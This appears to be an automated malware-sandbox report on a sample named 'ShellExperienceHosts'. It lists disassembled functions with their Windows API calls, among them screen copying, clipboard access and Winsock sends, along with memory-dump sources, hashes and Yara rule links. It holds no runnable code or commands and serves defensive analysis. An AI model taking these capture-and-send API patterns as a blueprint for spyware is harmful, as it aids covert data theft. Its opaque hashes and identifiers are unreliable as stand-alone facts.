                                                                            • String ID: B7}l
                                                                            • API String ID: 1242064992-4024997495
                                                                            • Opcode ID: d36385a95d5ada4627ae5519e00854b9ae866c338dd0ef7514837d7eebebe1e9
                                                                            • Instruction ID: 0277f874883a5ef76ea4432f4fcb8b9e831650cf94e3ed192f81feb4f8bff806
                                                                            • Opcode Fuzzy Hash: d36385a95d5ada4627ae5519e00854b9ae866c338dd0ef7514837d7eebebe1e9
                                                                            • Instruction Fuzzy Hash: 3CA13171A00119DFCF08CF95CA959EDBBB6FF49304F15812EE906AB694D731EA05CB90
                                                                            Function 6C722843 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 261windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C7226DF: GdipGetImagePixelFormat.GDIPLUS(?,6C8F1F5C,00000000,00000000,?,6C722887,05BCD017,00000000,00000000,6C8F1F5C), ref: 6C7226ED
                                                                              • Part of subcall function 6C722723: GdipGetImagePalette.GDIPLUS(?,00000000,00000000,?,?,6C7229A6,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,05BCD017), ref: 6C722732
                                                                            • GdipBitmapLockBits.GDIPLUS(?,?,00000001,?,00000000,00000000,00000000,?,00000000,00000000,00000000,05BCD017,00000000,00000000,6C8F1F5C), ref: 6C722A9B
                                                                            • GdipBitmapUnlockBits.GDIPLUS(?,00000000,?,?,00000001,?,00000000,00000000,00000000,?,00000000,00000000,00000000,05BCD017,00000000,00000000), ref: 6C722B4B
                                                                            • GdipDrawImageI.GDIPLUS(?,00000000,00000000,00000000,?,?,00000082,?,00022009,?,00000000,00000000,?,00000000,00000000,00000000), ref: 6C722B9D
                                                                            • GdipDeleteGraphics.GDIPLUS(?,?,00000000,00000000,00000000,?,?,00000082,?,00022009,?,00000000,00000000,?,00000000,00000000), ref: 6C722BA8
                                                                            • GdipDisposeImage.GDIPLUS(?,?,?,00000000,00000000,00000000,?,?,00000082,?,00022009,?,00000000,00000000,?,00000000), ref: 6C722BB3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Gdip$Image$BitmapBits$DeleteDisposeDrawFormatGraphicsLockPalettePixelUnlock
                                                                            • String ID: &$ &
                                                                            • API String ID: 1665940520-360661826
                                                                            • Opcode ID: c6c3e6a1564bc7623d03a954179e8d1db2c223f311057ffaab4b2fe185ef6e9e
                                                                            • Instruction ID: fed2adbdeda3cdf62f6d3867c72e0921b6ad02994ee2b7e73dac489749bad245
                                                                            • Opcode Fuzzy Hash: c6c3e6a1564bc7623d03a954179e8d1db2c223f311057ffaab4b2fe185ef6e9e
                                                                            • Instruction Fuzzy Hash: 08A18FB19111299BCB248F14C984AE9B7B5FF48328F5045E9EA08A7B01D734DE85CF98
                                                                            Function 6C7189D6 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 184COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_catch.LIBCMT ref: 6C7189E0
                                                                              • Part of subcall function 6C7C2EEA: __EH_prolog3.LIBCMT ref: 6C7C2EF1
                                                                            • IsWindow.USER32(?), ref: 6C718B13
                                                                              • Part of subcall function 6C770A0E: GetDlgCtrlID.USER32(?), ref: 6C770A19
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CtrlH_prolog3H_prolog3_catchWindow
                                                                            • String ID: %TsMFCToolBar-%d$%TsMFCToolBar-%d%x$Buttons$MFCToolBars$Name
                                                                            • API String ID: 1537839037-190999575
                                                                            • Opcode ID: ab83e913d882a4a4cca73385fc8616040f59d90ea9a478c7282acf9571891203
                                                                            • Instruction ID: 7673d22812f80546926c2c0ae4ddabbbfdb828416900685aa52413afe7da8352
                                                                            • Opcode Fuzzy Hash: ab83e913d882a4a4cca73385fc8616040f59d90ea9a478c7282acf9571891203
                                                                            • Instruction Fuzzy Hash: 70718D70A00219EFDF15CBA4CA58EEDBBB5AF49318F1441A9E811B7B90DB309E04DB65
                                                                            Function 6C75AE21 Relevance: 12.2, APIs: 8, Instructions: 169windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CaptureDestroyEmptyMessageParentPointsRectReleaseSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3509494761-0
                                                                            • Opcode ID: 5bfa4756ee80c5efe324d73c8a9700d1fab09b882e46c43547fb5e5e9682fa6d
                                                                            • Instruction ID: 3f9247136b60763c1361603e20f855c4a3ac9b5646ee41110e5a436ecfb84d6d
                                                                            • Opcode Fuzzy Hash: 5bfa4756ee80c5efe324d73c8a9700d1fab09b882e46c43547fb5e5e9682fa6d
                                                                            • Instruction Fuzzy Hash: CF51AB707002159FDF119F20C999BBA3BB5AF49309F4401B8EC1AAF695CF31AD09CBA1
                                                                            Function 6C7EAFC7 Relevance: 12.1, APIs: 8, Instructions: 118clipboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 6C7EAFCE
                                                                              • Part of subcall function 6C6E2C90: __EH_prolog3.LIBCMT ref: 6C6E2C97
                                                                              • Part of subcall function 6C6E2C90: GetWindowDC.USER32(00000000,00000004,6C7413FB,00000000), ref: 6C6E2CC3
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 6C7EB00E
                                                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C7EB030
                                                                              • Part of subcall function 6C6E2A7E: SelectObject.GDI32(?,!+nl), ref: 6C6E2A87
                                                                            • FillRect.USER32(?,?,?), ref: 6C7EB07A
                                                                            • OpenClipboard.USER32(?), ref: 6C7EB0AA
                                                                            • EmptyClipboard.USER32 ref: 6C7EB0E8
                                                                            • SetClipboardData.USER32(00000002,00000000), ref: 6C7EB10C
                                                                            • CloseClipboard.USER32 ref: 6C7EB126
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$CompatibleCreate$BitmapCloseDataEmptyFillH_prolog3H_prolog3_catch_ObjectOpenRectSelectWindow
                                                                            • String ID:
                                                                            • API String ID: 2940850299-0
                                                                            • Opcode ID: 310d4c61ecb4ac3ec868aa3c39b051d0680cd65465354eaca646c02450afbec4
                                                                            • Instruction ID: 532a5766ccedce4b3bda921cc9d5bc1569fe3d428d4cfd0f62c0f3e936a6f12a
                                                                            • Opcode Fuzzy Hash: 310d4c61ecb4ac3ec868aa3c39b051d0680cd65465354eaca646c02450afbec4
                                                                            • Instruction Fuzzy Hash: D4416271905119EBDB10DBE8CA48ADDBB79AF0E318F104125E511B3690DB30AE09CBAC
                                                                            Function 6C724BCB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C724BD2
                                                                              • Part of subcall function 6C6E2C90: __EH_prolog3.LIBCMT ref: 6C6E2C97
                                                                              • Part of subcall function 6C6E2C90: GetWindowDC.USER32(00000000,00000004,6C7413FB,00000000), ref: 6C6E2CC3
                                                                            • CreateCompatibleDC.GDI32(?), ref: 6C724C22
                                                                            • CreateCompatibleDC.GDI32(?), ref: 6C724C34
                                                                            • SelectObject.GDI32(?,?), ref: 6C724C51
                                                                            • SelectObject.GDI32(?,00000000), ref: 6C724C69
                                                                            • BitBlt.GDI32(?,?,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6C724C8F
                                                                            • SelectObject.GDI32(?,00000000), ref: 6C724C9D
                                                                            • SelectObject.GDI32(?,00000000), ref: 6C724CAB
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSelect$CompatibleCreateH_prolog3$Window
                                                                            • String ID:
                                                                            • API String ID: 1662780096-0
                                                                            • Opcode ID: 83fddf001cc64aac4fba9d011abb21b0897462951bc5ff8f2428f96e8324d01e
                                                                            • Instruction ID: f962344e627ffc9b12e4a09be87b28dee63ae01b8d8fb2a3661c1d32789d9a60
                                                                            • Opcode Fuzzy Hash: 83fddf001cc64aac4fba9d011abb21b0897462951bc5ff8f2428f96e8324d01e
                                                                            • Instruction Fuzzy Hash: 1B319031902115EFDF15DFA4CE49AEDBBB5FF19308F104029E50163A50CB74AE19DBA4
                                                                            Function 02233F37 Relevance: 12.1, APIs: 8, Instructions: 79networkthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 02233F3C
                                                                            • SetLastError.KERNEL32(0000139F,?,10015054,0223361F), ref: 0223402B
                                                                              • Part of subcall function 02232B57: SwitchToThread.KERNEL32 ref: 02232B81
                                                                            • send.WS2_32(?,10017440,00000010,00000000), ref: 02233F9D
                                                                            • SetEvent.KERNEL32(?), ref: 02233FC0
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02233FCC
                                                                            • WSACloseEvent.WS2_32(?), ref: 02233FDA
                                                                            • shutdown.WS2_32(?,00000001), ref: 02233FF2
                                                                            • closesocket.WS2_32(?), ref: 02233FFC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: EventThread$CloseCurrentErrorExchangeInterlockedLastSwitchclosesocketsendshutdown
                                                                            • String ID:
                                                                            • API String ID: 518013673-0
                                                                            • Opcode ID: 5b0e511d635cae701d0a261cd8daf94e2af27413da8a227727d1db7110453b86
                                                                            • Instruction ID: 84b1be64ba20a0127a61d379b28e98c53a727328fbabd055a27e858507feb878
                                                                            • Opcode Fuzzy Hash: 5b0e511d635cae701d0a261cd8daf94e2af27413da8a227727d1db7110453b86
                                                                            • Instruction Fuzzy Hash: D0216BB0210711DBE336AFA4C888B9A77B5BB44719F044909E5828B694C7B6E445CB90
                                                                            Function 10003F60 Relevance: 12.1, APIs: 8, Instructions: 79networkthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 10003F65
                                                                            • SetLastError.KERNEL32(0000139F,?,74DEDFA0,10003648), ref: 10004054
                                                                              • Part of subcall function 10002B80: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 10002B96
                                                                              • Part of subcall function 10002B80: SwitchToThread.KERNEL32 ref: 10002BAA
                                                                            • send.WS2_32(?,10017440,00000010,00000000), ref: 10003FC6
                                                                            • SetEvent.KERNEL32(?), ref: 10003FE9
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 10003FF5
                                                                            • WSACloseEvent.WS2_32(?), ref: 10004003
                                                                            • shutdown.WS2_32(?,00000001), ref: 1000401B
                                                                            • closesocket.WS2_32(?), ref: 10004025
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                            • String ID:
                                                                            • API String ID: 3254528666-0
                                                                            • Opcode ID: 5b0e511d635cae701d0a261cd8daf94e2af27413da8a227727d1db7110453b86
                                                                            • Instruction ID: f90f9a9b3ecf0f3d74d2563f24973b51980f03fc9dc1a8ff13de2f0f8c7e6f1d
                                                                            • Opcode Fuzzy Hash: 5b0e511d635cae701d0a261cd8daf94e2af27413da8a227727d1db7110453b86
                                                                            • Instruction Fuzzy Hash: 822148B56007109BE321DF64C888B9BB7F9FB44791F04891DF6869B690CBB6F845CB50
                                                                            Function 10004060 Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004074
                                                                            • ResetEvent.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004087
                                                                            • ResetEvent.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004090
                                                                            • ResetEvent.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004099
                                                                              • Part of subcall function 10001350: HeapFree.KERNEL32(?,00000000,?,?,?,100040A6,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10001390
                                                                              • Part of subcall function 10001420: HeapFree.KERNEL32(?,00000000,?,?,?,100040B1,?,00000000,10004039,?,74DEDFA0,10003648), ref: 1000143D
                                                                              • Part of subcall function 10001420: _free.LIBCMT ref: 10001459
                                                                            • HeapDestroy.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 100040B9
                                                                            • HeapCreate.KERNEL32(?,?,?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 100040D4
                                                                            • SetEvent.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004150
                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004157
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                            • String ID:
                                                                            • API String ID: 1219087420-0
                                                                            • Opcode ID: a47338e344b9415d0666abf4aacaa3da54f4cea86e3874ea6b078b9e747c069c
                                                                            • Instruction ID: 23a0d0040592214b09f8a584f6cc232509badf453808b3f4ba03db8ba96dcbd9
                                                                            • Opcode Fuzzy Hash: a47338e344b9415d0666abf4aacaa3da54f4cea86e3874ea6b078b9e747c069c
                                                                            • Instruction Fuzzy Hash: 043143B0200A02EFE705CB64C898B96F7A8FF48351F058249E4298B264CB35F951CFD0
                                                                            Function 6C7A890C Relevance: 12.1, APIs: 8, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemMetrics.USER32(00000020), ref: 6C7A893A
                                                                            • GetSystemMetrics.USER32(00000021), ref: 6C7A8944
                                                                            • GetSystemMetrics.USER32(00000005), ref: 6C7A8953
                                                                            • GetSystemMetrics.USER32(00000006), ref: 6C7A895D
                                                                            • GetSystemMetrics.USER32(0000005C), ref: 6C7A8974
                                                                            • GetSystemMetrics.USER32(0000005C), ref: 6C7A897E
                                                                            • GetSystemMetrics.USER32(00000007), ref: 6C7A8996
                                                                            • GetSystemMetrics.USER32(00000008), ref: 6C7A89A0
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem
                                                                            • String ID:
                                                                            • API String ID: 4116985748-0
                                                                            • Opcode ID: c77ddf756ce58dbe4b9be5a7aaf06c95c2f36dd3299daf596314b6ec2faf2775
                                                                            • Instruction ID: 763911b82aa0e7483abeff1662ecab9de74f96f813205e3e80c27791a3ccc2ab
                                                                            • Opcode Fuzzy Hash: c77ddf756ce58dbe4b9be5a7aaf06c95c2f36dd3299daf596314b6ec2faf2775
                                                                            • Instruction Fuzzy Hash: 221119B26417129FEB204FA5CA08715FBF4AF1571AF10443AF6A5CB680DB74A842CB96
                                                                            Function 6C6F64FF Relevance: 10.9, APIs: 7, Instructions: 414COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C6F6506
                                                                            • GetWindow.USER32(?,00000005), ref: 6C6F6575
                                                                              • Part of subcall function 6C6F6F6C: __EH_prolog3.LIBCMT ref: 6C6F6F73
                                                                              • Part of subcall function 6C6F6F6C: GetWindow.USER32(?,00000005), ref: 6C6F6F91
                                                                              • Part of subcall function 6C6F6F6C: GetWindow.USER32(?,00000002), ref: 6C6F6FCA
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$H_prolog3
                                                                            • String ID:
                                                                            • API String ID: 1351209170-0
                                                                            • Opcode ID: e4449bb3de4d9f9b911ecb4e7867a90121b67c49b31c5e9a577295d3085d8c2d
                                                                            • Instruction ID: d72ee0cb893d7d3ae24712a72a0a760ba55b89d9bf83a31d8599d7071ac2d3bc
                                                                            • Opcode Fuzzy Hash: e4449bb3de4d9f9b911ecb4e7867a90121b67c49b31c5e9a577295d3085d8c2d
                                                                            • Instruction Fuzzy Hash: 5BF16D75B012269FCF14DF64C858AEDB7B2BF49318F104169E822E7790CB30AD06CB99
                                                                            Function 031AB62F Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 351COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$_malloc
                                                                            • String ID: ($6$gfff$gfff
                                                                            • API String ID: 3506388080-713438465
                                                                            • Opcode ID: adc29c7617633d4b8d790a07087d8aa0c6b7af03618b52efd29b7f2ce1e6f169
                                                                            • Instruction ID: 769677e442ce3b34e465d6c4ccc2630e89b10d362e3f05e5358bb5af988dbe4b
                                                                            • Opcode Fuzzy Hash: adc29c7617633d4b8d790a07087d8aa0c6b7af03618b52efd29b7f2ce1e6f169
                                                                            • Instruction Fuzzy Hash: 1FD18CB5E00318AFDB14EFE9DC85AAEFBB9FF48300F144129E505AB251D774A905CBA1
                                                                            Function 6C6EAF19 Relevance: 10.8, APIs: 7, Instructions: 318COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C6EAF20
                                                                            • InflateRect.USER32(?,00000002,00000000), ref: 6C6EB11C
                                                                              • Part of subcall function 6C7B0BCD: SetRectEmpty.USER32(?), ref: 6C7B0BE6
                                                                            • IsRectEmpty.USER32(?), ref: 6C6EB1B7
                                                                              • Part of subcall function 6C73913E: GetParent.USER32(?), ref: 6C73916A
                                                                              • Part of subcall function 6C6E2DA8: ScreenToClient.USER32(?,?), ref: 6C6E2DB7
                                                                              • Part of subcall function 6C6E2DA8: ScreenToClient.USER32(?,?), ref: 6C6E2DC4
                                                                            • GetWindowRect.USER32(?,?), ref: 6C6EB1F0
                                                                            • UnionRect.USER32(?,?,?), ref: 6C6EB214
                                                                            • EqualRect.USER32(?,?), ref: 6C6EB222
                                                                            • OffsetRect.USER32(?,?,?), ref: 6C6EB23F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$ClientEmptyScreen$EqualH_prolog3_InflateOffsetParentUnionWindow
                                                                            • String ID:
                                                                            • API String ID: 1622821726-0
                                                                            • Opcode ID: 1122f4f54b269b74ba04a8b3f7160fa86554315ec262b143ee05eec6d6d4246e
